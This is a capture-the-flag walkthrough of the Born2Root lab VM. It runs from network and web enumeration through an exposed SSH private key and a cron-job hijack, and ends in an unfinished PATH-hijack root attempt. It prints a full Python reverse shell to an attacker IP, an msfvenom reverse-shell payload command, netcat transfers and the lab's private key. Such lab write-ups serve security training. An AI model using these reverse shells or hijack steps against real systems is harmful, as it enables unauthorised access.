BootToBeRoot: CTF walkthrough

Introduction

Name: Born2Root

Date of release: 10 Jun 2017

Author: Hadi Mene

Series: Born2Root


Enumeration

First of all, we can get the IP address of the VM.

[email protected]:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
192.168.1.29    08:00:27:84:43:c4    CADMUS COMPUTER SYSTEMS (DUP: 2)
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.373 seconds (107.88 hosts/sec). 8 responded
[email protected]:~$

Then, we can scan the target to find open ports:

[email protected]:/$ nmap -A -sV -O -p22,80,111,47416 --reason 192.168.1.29

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-27 15:22 EST
Nmap scan report for debian-1.home (192.168.1.29)
Host is up, received arp-response (0.00059s latency).

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (EdDSA)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|http-title:  Secretsec Company 
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47416/tcp  status
|  100024  1          49516/udp  status
47416/tcp open  status  syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms debian-1.home (192.168.1.29)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
[email protected]:/$

The RPC service does not give us useful information, so that’s gonna be a web CTF.


Secret Key

After a quick directory enumeration with the gobuster tool we can find two interesting folder: files and icons

[email protected]:~$ gobuster -u http://192.168.1.29 -w /usr/share/seclists/Discovery/Web_Content/common.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.29/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 204,301,302,307,200
[+] Expanded     : true
=====================================================
http://192.168.1.29/files (Status: 301)
http://192.168.1.29/icons (Status: 301)
http://192.168.1.29/index.html (Status: 200)
http://192.168.1.29/manual (Status: 301)
http://192.168.1.29/robots.txt (Status: 200)
=====================================================
[email protected]:~$

The first is empty, so useless:

[email protected]:/$ curl -s -L http://192.168.1.29/files/ | html2text -width 150 |uniq
** Index of /files **
[[ICO]]       Name             Last_modified Size Description
==================================================================================================================================================
[[PARENTDIR]] Parent_Directory                 -
==================================================================================================================================================
     Apache/2.4.10 (Debian) Server at 192.168.1.29 Port 80
[email protected]:/$

But, fortunately for us, the second folder contains a weird txt file named VDSoyuAXiO.txt:

[email protected]:/$ curl -s -L http://192.168.1.29/icons/ | html2text -width 150 |uniq
** Index of /icons **
[[ICO]]       Name              Last_modified    Size Description
==================================================================================================================================================
[[PARENTDIR]] Parent_Directory                     -
[[   ]]       README            2017-06-07 22:29 5.0K
[[TXT]]       README.html       2017-06-07 22:29  35K
[[TXT]]       VDSoyuAXiO.txt    2017-06-07 22:34 1.6K
[[IMG]]       a.gif             2017-06-07 22:29  246
[[IMG]]       a.png             2017-06-07 22:29  306
[[IMG]]       alert.black.gif   2017-06-07 22:29  242
[[IMG]]       alert.black.png   2017-06-07 22:29  293
[[IMG]]       alert.red.gif     2017-06-07 22:29  247
[[IMG]]       alert.red.png     2017-06-07 22:29  314
[[IMG]]       apache_pb.gif     2017-06-07 22:29 4.4K
[[IMG]]       apache_pb.png     2017-06-07 22:29 9.5K
[[IMG]]       apache_pb.svg     2017-06-07 22:29 260K
[[IMG]]       apache_pb2.gif    2017-06-07 22:29 4.1K
[[IMG]]       apache_pb2.png    2017-06-07 22:29  10K
[[IMG]]       back.gif          2017-06-07 22:29  216
[[IMG]]       back.png          2017-06-07 22:29  308
[[IMG]]       ball.gray.gif     2017-06-07 22:29  233
[[IMG]]       ball.gray.png     2017-06-07 22:29  298
[[IMG]]       ball.red.gif      2017-06-07 22:29  205

This is more than a simple txt file, it’s a private key. Private key that we will use to log in the server via SSH.

[email protected]:/$ curl -s -L http://192.168.1.29/icons/VDSoyuAXiO.txt

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
tprVUPb+fmkKvOf5ntACY7c/5fM4y83+UWPG0l90WrjdaTCPaGAHjEpZYKt0lEc0
FiQkXTvJS4faYHNah/mEvhldgTc59jeX4di0f660mJjF31SA9UgMLQReKd5GKtUx
5m+sQq6L+VyA2/6GD/T3qx35AT4argdk1NZ9ONmj1ZcIp0evVJvUul34zuJZ5mDv
DZuLRR6QpcMLJRGEFZ4qwkMZn7NavEmfX1Yka6mu9iwxkY6iT45YA1C4p7NEi5yI
/P6kDxMfCVELAUaU8fcPolkZ6xLdS6yyThZHHwIDAQABAoIBAAZ+clCTTA/E3n7E
LL/SvH3oGQd16xh9O2FyR4YIQMWQKwb7/OgOfEpWjpPf/dT+sK9eypnoDiZkmYhw
+rGii6Z2wCXhjN7wXPnj1qotXkpu4bgS3+F8+BLjlQ79ny2Busf+pQNf1syexDJS
sEkoDLGTBiubD3Ii4UoF7KfsozihdmQY5qud2c4iE0ioayo2m9XIDreJEB20Q5Ta
lV0G03unv/v7OK3g8dAQHrBR9MXuYiorcwxLAe+Gm1h4XanMKDYM5/jW4JO2ITAn
kPducC9chbM4NqB3ryNCD4YEgx8zWGDt0wjgyfnsF4fiYEI6tqAwWoB0tdqJFXAy
FlQJfYECgYEAz1bFCpGBCApF1k/oaQAyy5tir5NQpttCc0L2U1kiJWNmJSHk/tTX
4+ly0CBUzDkkedY1tVYK7TuH7/tOjh8M1BLa+g+Csb/OWLuMKmpoqyaejmoKkLnB
WVGkcdIulfsW7DWVMS/zA8ixJpt7bvY7Y142gkurxqjLMz5s/xT9geECgYEAxpfC
fGvogWRYUY07OLE/b7oMVOdBQsmlnaKVybuKf3RjeCYhbiRSzKz05NM/1Cqf359l
Wdznq4fkIvr6khliuj8GuCwv6wKn9+nViS18s1bG6Z5UJYSRJRpviCS+9BGShG1s
KOf1fAWNwRcn1UKtdQVvaLBX9kIwcmTBrl+e6P8CgYAtz24Zt6xaqmpjv6QKDxEq
C1rykAnx0+AKt3DVWYxB1oRrD+IYq85HfPzxHzOdK8LzaHDVb/1aDR0r2MqyfAnJ
kaDwPx0RSN++mzGM7ZXSuuWtcaCD+YbOxUsgGuBQIvodlnkwNPfsjhsV/KR5D85v
VhGVGEML0Z+T4ucSNQEOAQKBgQCHedfvUR3Xx0CIwbP4xNHlwiHPecMHcNBObS+J
4ypkMF37BOghXx4tCoA16fbNIhbWUsKtPwm79oQnaNeu+ypiq8RFt78orzMu6JIH
dsRvA2/Gx3/X6Eur6BDV61to3OP6+zqh3TuWU6OUadt+nHIANqj93e7jy9uI7jtC
XXDmuQKBgHZAE6GTq47k4sbFbWqldS79yhjjLloj0VUhValZyAP6XV8JTiAg9CYR
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----

[email protected]:/$

Note, we can find a list of potential user in the home page of the website:

  • Martin N;
  • Hadi M; and
  • Jimmy S


First Shell

First of all we have to change the permission of this private key if we want to use it.

chmod 700 privatekey

Then we have to find with which user we can use this private key.

[email protected]:~/Desktop$ for user in hadi jimmy martin; do
for> ssh -i privatekey [email protected] -o 'UserKnownHostsFile /dev/null'
for> done
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
[email protected]: Permission denied (publickey,password).
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected].168.1.29's password: 
[email protected]: Permission denied (publickey,password).
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun  9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ? 

secret password : 

Apparently it’s with Martin but an extra password is required.

The creator made a mistake or something like that because regardless of the password you enter it’s always working. The Python script:

[email protected]:~$ cat .bashrc |tail -1
/var/tmp/login.py
[email protected]:~$ cat /var/tmp/login.py
#!/usr/bin/python

import os

print("")
print("READY TO ACCESS THE SECRET LAB ? ")
print("")
password = raw_input("secret password : ")

if (password) == "secretsec" or "secretlab" :
    print("WELCOME ! ")
else:
    print("GET OUT ! ")
    os.system("pkill -u 'martin'")
[email protected]:~$ 


From Martin to Jimmy

After some research we can find a mistake in the /etc/crontab file. The user Jimmy execute a python script without any security check. We simple have to create a python script named sekurity.py and it will be executed by Jimmy.

[email protected]:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17           root    cd / && run-parts --report /etc/cron.hourly
25 6          root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6      7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1      root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/5         jimmy   python /tmp/sekurity.py
[email protected]:~$ 

We can create this simple python reverse shell:

martin@debian:~$ cat /tmp/sekurity.py 
#!/usr/bin/python
import subprocess
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.116', 7734))

os.dup2(s.fileno(), 0) #stdin
os.dup2(s.fileno(), 1) #stdout
os.dup2(s.fileno(), 2) #stderr

process = subprocess.call(["/bin/sh","-i"])
martin@debian:~$ 

After few minutes we successfully have a shell with Jimmy’s privilege.


From Jimmy to Root

In the Jimmy’s home folder we can find the networker binary who apparently execute few network commands. The interesting thing about this binary is that he will be executed with root privilege, so if we find a way to makes this binary execute arbitrary commands we will probably gain root privileges.

Let’s check if system commands with relative path are used by this binary:

[email protected]:~$ strings networker
strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
cxa_finalize
libc_start_main
_ITM_deregisterTMCloneTable
gmon_start
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC2.0
UWVS
t$,U
[^]
 Networker 2.0  
/sbin/ifconfig
/bin/ping -c 1  localhost 
Done 
echo 'echo linux tool version 5' 
[..snip..]

The echo command looks like a good choice for us. Let’s create a binary named echo.

[email protected]:/var/www/html$ msfvenom -p linux/x86/shell_reverse_tcp LPORT=3477 LHOST=192.168.1.116 -f elf -o echo
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: echo

Now, we can download with nc the binary. Note, curl and wget are restricted and unusable.

[Targeted system]
[email protected]:~$ nc -lvvp 7777 > echo
nc -lvvp 7777 > echo
listening on [any] 7777 ...
connect to [192.168.1.29] from kali-1.home [192.168.1.116] 35672
 sent 0, rcvd 152
[email protected]:~$


[My system]
[email protected]:/var/www/html$ nc -nvv 192.168.1.29 7777 < echo
(UNKNOWN) [192.168.1.29] 7777 (?) open
^C sent 152, rcvd 0
[email protected]:/var/www/html$

Finally we change the PATH environment variable and we will be good to go.

[email protected]:~$ export PATH=/home/jimmy:$PATH
export PATH=/home/jimmy:$PATH
[email protected]:~$ echo $PATH
echo $PATH
/home/jimmy:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
[email protected]:~$

Unfortunately for us, the creator made another mistake with this binary and we are not able to exploit this vulnerability in the networker binary.



break

Comments